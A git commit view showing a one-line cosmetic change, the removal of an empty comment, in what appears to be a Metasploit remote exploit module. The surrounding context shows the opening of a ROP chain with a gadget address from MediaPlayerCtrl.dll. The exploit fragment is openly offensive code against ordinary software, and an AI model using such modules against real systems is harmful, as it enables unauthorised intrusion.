oops, I don't need that extra comment
parent
84c5268ab4
commit
ed5bae6441
|
@ -71,7 +71,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def exploit
|
||||
#
|
||||
rop = [
|
||||
nops(true, 10), #ROP NOP
|
||||
0x6405347a, #POP EDX # RETN (MediaPlayerCtrl.dll)
|
||||
|
|
Loading…
Reference in New Issue